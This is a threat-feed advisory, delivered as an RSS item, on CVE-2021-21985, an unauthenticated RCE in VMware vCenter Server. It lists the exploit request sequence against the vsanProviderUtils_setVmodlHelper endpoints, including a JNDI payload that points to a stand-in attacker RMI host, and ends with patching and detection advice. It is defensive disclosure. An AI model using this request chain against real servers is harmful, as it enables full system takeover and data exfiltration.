<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:webfeeds="http://webfeeds.org/rss/1.0"><channel><title>VCenter Server (6.5, 6.7, 7.0) - CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/products/vcenter-server-6.5-6.7-7.0/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata. Fed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Wed, 07 Oct 2026 01:30:33 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/products/vcenter-server-6.5-6.7-7.0/feed.xml" rel="self" type="application/rss+xml"/><image><url>https://feed.craftedsignal.io/favicon-32x32.png</url><title>CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/</link><width>32</width><height>32</height></image><webfeeds:icon>https://feed.craftedsignal.io/favicon.svg</webfeeds:icon><item><title>Exploitation of CVE-2021-21985 in VMware vCenter Server</title><link>https://feed.craftedsignal.io/briefs/2026-10-cve-2021-21985-vcenter-rce/</link><pubDate>Wed, 07 Oct 2026 01:30:33 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-10-cve-2021-21985-vcenter-rce/</guid><description>Public proof-of-concept exploits for CVE-2021-21985 have been released, enabling unauthenticated remote code execution in VMware vCenter Server via the Virtual SAN Health Check plug-in.</description><content:encoded><![CDATA[<p>CVE-2021-21985 is a critical remote code execution (RCE) vulnerability affecting the vSphere Client (HTML5) in VMware vCenter Server versions 6.5, 6.7, and 7.0. The vulnerability is caused by an input validation flaw within the Virtual SAN Health Check plug-in, which is enabled by default. As of October 2026, multiple proof-of-concept (PoC) exploits have been published on security platforms, significantly lowering the barrier for exploitation. An unauthenticated attacker can send specially crafted HTTP POST requests to the vCenter server to trigger arbitrary code execution via JNDI lookup or other VMODL helper operations. This vulnerability is highly dangerous due to its remote, unauthenticated nature and CVSS score of 10.0, allowing complete system compromise.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker performs initial reconnaissance to identify internet-facing vCenter instances.</li>
<li>The attacker sends an HTTP POST request to '/ui/h5-vsan/rest/proxy/service/&amp;vsanProviderUtils_setVmodlHelper/setTargetObject' to set the target object to null.</li>
<li>The attacker sends a request to '/ui/h5-vsan/rest/proxy/service/&amp;vsanProviderUtils_setVmodlHelper/setStaticMethod' with 'javax.naming.InitialContext.doLookup' as the payload.</li>
<li>The attacker configures the target method by sending a POST request to '/ui/h5-vsan/rest/proxy/service/&amp;vsanProviderUtils_setVmodlHelper/setTargetMethod' with 'doLookup'.</li>
<li>The attacker specifies the JNDI payload, such as 'rmi://attacker-controlled-server:9090/resource', via a POST request to '/ui/h5-vsan/rest/proxy/service/&amp;vsanProviderUtils_setVmodlHelper/setArguments'.</li>
<li>The attacker initializes the helper class by sending a POST request to the 'prepare' endpoint.</li>
<li>The attacker triggers the final payload execution by sending a POST request to the 'invoke' endpoint.</li>
<li>The vCenter server initiates an outbound connection to the attacker's infrastructure, resulting in code execution or data exfiltration.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation allows an unauthenticated remote attacker to gain full control over the vCenter Server. This impact includes complete loss of confidentiality, integrity, and availability for the vCenter instance and all virtual machines managed by it. Given the prevalence of vCenter in enterprise environments, successful exploitation could facilitate widespread ransomware distribution or persistent lateral movement within an organization's internal network.</p>
<h2 id="recommendation">Recommendation</h2>
<p>Prioritized, concrete actions for detection engineering teams:</p>
<ul>
<li>Patch all instances of VMware vCenter Server to the latest version as recommended in VMSA-2021-0010.</li>
<li>Deploy the Sigma rule below to monitor for unauthorized usage of the 'vsanProviderUtils_setVmodlHelper' service.</li>
<li>Monitor firewall and proxy logs for unusual outbound connections originating from vCenter Servers, specifically RMI or LDAP traffic (TCP/9090 or others).</li>
<li>Enable detailed logging for the vSphere Client ('/var/log/vmware/vsphere-ui/logs/vsphere_client_virgo.log') and audit for the specific endpoints described in the attack chain.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>vulnerability</category><category>rce</category><category>vmware</category></item></channel></rss>